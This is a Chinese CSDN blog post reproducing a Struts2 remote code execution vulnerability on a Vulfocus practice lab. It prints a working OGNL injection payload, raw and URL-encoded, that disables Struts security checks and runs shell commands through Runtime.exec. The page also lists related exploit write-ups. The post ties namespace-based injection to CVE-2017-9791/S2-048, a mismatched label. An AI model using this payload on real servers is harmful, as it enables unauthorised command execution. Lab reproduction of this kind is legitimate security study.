vulfocus——struts2-cve_2017_9791

已于 2022-09-06 19:01:55 修改
阅读量335 收藏
点赞数
分类专栏: vulfocus复现 文章标签: struts java servlet
于 2022-09-06 19:00:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62063669/article/details/126731024
版权

描述

1.定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace可能会导致远程代码执行漏洞的发生。

2.url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行。

alwaysSelectFul1Namespace = true时action元素没有设置namespace属性,这时如果使用了通配符命名空间则namespace将由用户从uri传递,并解析为OGNL表达式,最终导致远程代码执行漏洞。

复现

 

 测试命名空间可执行性,发现运算被执行

payload要进行URL编码,未编码的话可能会导致服务出错

GET /showcase/%24%7b%28%35%35%2b%34%34%29%7d/actionChain1.action HTTP/1.1

未编码的payload

${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('填写命令')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))
}

GET /showcase/$%7B%0A(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B'struts.valueStack'%5D.context).(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec('ls%0a/tmp')).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action HTTP/1.1

隐身的菜鸟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulfocus解题复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791
温氏效应
09-04 3835
漏洞介绍 名称:Struts2 S2-048 远程命令执行漏洞 CVE标识符:CVE-2017-9791 描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 攻击者构造恶意字段值(value)通过Struts2struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。 解题过程 1、打开靶场环境 2、.
Struts2 S2-015 远程代码执行漏洞(CVE-2013-2135
最新发布
qq_68163788的博客
06-23 317
Apache Struts 2是一个用于构建企业级Java Web应用程序的开源Web应用程序框架。它采用MVC(Model-View-Controller)模式,允许开发人员将业务逻辑、数据传输和用户界面分开,从而实现更好地组织和维护代码。Struts 2具有强大的功能,包括拦截器支持、表单验证、国际化、标签库、表单标记等,使开发人员能够快速构建功能丰富的Web应用程序。
[Vulfocus解题系列]struts2-048 远程代码执行CVE-2017-9791
00勇士王子的博客
07-11 1048
漏洞介绍 名称: struts2-048 远程代码执行CVE-2017-9791) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 当Struts 2中的Struts 1插件启用的情况下,攻击者通过构造恶意字段可以造成RCE 解题过程 1.打开靶场环境 2.访问漏洞存在的路径 /integration/saveGangster.actio
struts2-cve_2017_9791 复现
king丶
09-02 1014
struts2-cve_2017_9791 复现 我用的是 重生信安的在线靶场 http://bc.csxa.cn:9000/ poc https://github.com/jas502n/st2-048 用的python2 环境 安装requests 库 py -2 St2-048.py set url : http://xx.xx.xx.xx:port/integration/saveGangster.action ...
struts2 代码执行CVE-2017-9791
个人笔记
08-31 353
struts2 代码执行CVE-2017-9791) #!/usr/bin/python # -*- coding: utf-8 -*- import json,re import requests import threading import urllib def Poc(url,command): header = {'Content-Type': 'application/x-www-form-urlencoded'} poc = {"name":"%{(#szgx='mu
struts2-scan_struts2-scan_struts2scan_scan_struts2漏洞_
09-29
2017年,一个名为CVE-2017-9805的重大漏洞被发现,它允许远程攻击者通过恶意构造的HTTP请求头注入任意的OGNL表达式,从而执行服务器端代码,这可能导致数据泄露、系统权限提升甚至完全控制服务器。 "struts2-scan...
xalanjava源码-study-struts2-s2-054_055-jackson-cve-2017-7525_cve-2017-150
06-05
CVE-2017-7525、CVE-2017-15095 调查报告 我们发表了一篇总结文章,只总结了要点,便于阅读。推荐给那些想要获得概览或没有空闲时间的人。 SSTtechlog 08 S2-054、S2-055 和 jackson-databind 漏洞 CVE-2017-7525、...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
其中,S2-045 和 CVE-2017-5638 是一个极其严重的问题,可能导致远程代码执行(RCE),进而让攻击者完全控制受影响的服务器。 S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个...
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
Vulfocus-struts2初了解
Aiwin的博客
05-08 536
Vulfocus-struts2-CVE通关初了解
【漏洞公告】CVE-2017-9791:Struts(S2-048)远程命令执行漏洞
07-11 1192
了解更多技术文章请点击原文链接 2017年7月7日,ApacheStruts发布最新的安全公告,漏洞编号为S2-048,该漏洞存在Struts2Struts1一个Showcase插件Action Message类中,通过构建不可信的输入实现远程命令攻击,存在安全风险。具体详情如下:...
[Vulfocus]struts2-048 远程代码执行CVE-2017-9791
weixin_54962591的博客
11-24 525
[Vulfocus]struts2-048 远程代码执行CVE-2017-9791)拿flag
开发者论坛一周精粹(第十三期):CVE-2017-9791:Struts(S2-048)远程命令执行漏洞
weixin_34302561的博客
07-21 116
第十三期(2017年7月3日-2017年7月9日 ) 2017年7月7日,Apache Struts发布最新的安全公告,漏洞编号为S2-048,该漏洞存在Struts2Struts1一个Showcase插件Action Message类中,通过构建不可信的输入实现远程命令攻击,存在安全风险。 【漏洞公告】CVE-2017-9791:Struts(S...
apache struts linux,Apache Struts远程代码执行漏洞(CVE-2017-9791
weixin_33178459的博客
05-14 164
Apache Struts远程代码执行漏洞(CVE-2017-9791)发布日期:2017-07-05更新日期:2017-07-10受影响系统:Apache Group Struts 2.3.xApache Group Struts描述:BUGTRAQ ID: 99484CVE(CAN) ID: CVE-2017-9791Struts2 是构建企业级Jave Web应用的可扩展框架。在Strut...
Struts2反序列化漏洞复现
热门推荐
wangyuxiang946的博客
07-20 1万+
作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。环境: vulhub。
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135
qq_51577576的博客
11-19 721
[ vulhub漏洞复现篇 ] Struts2远程代码执行(S2-015)(CVE-2013-2135) Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞。远程攻击者可借助带有‘${}’和‘%{}’序列值(可导致判断OGNL代码两次)的请求,利用该漏洞执行任意OGNL代码。
Struts2_015_RCE CVE-2013-2134 漏洞复现
ADummy的博客
02-18 1016
Struts2_015_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ 如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如: <package name="S2-012" extends="struts-default"> <action name="user" class=
Log4j-CVE-2017-5645
10-05
Log4j-CVE-2017-5645是指Apache Log4j 2.x版本中存在的安全漏洞。攻击者可以利用该漏洞执行任意代码。为了利用该漏洞,攻击者可以使用ysoserial生成payload,并发送到受影响的Log4j服务器。具体操作可以使用以下命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值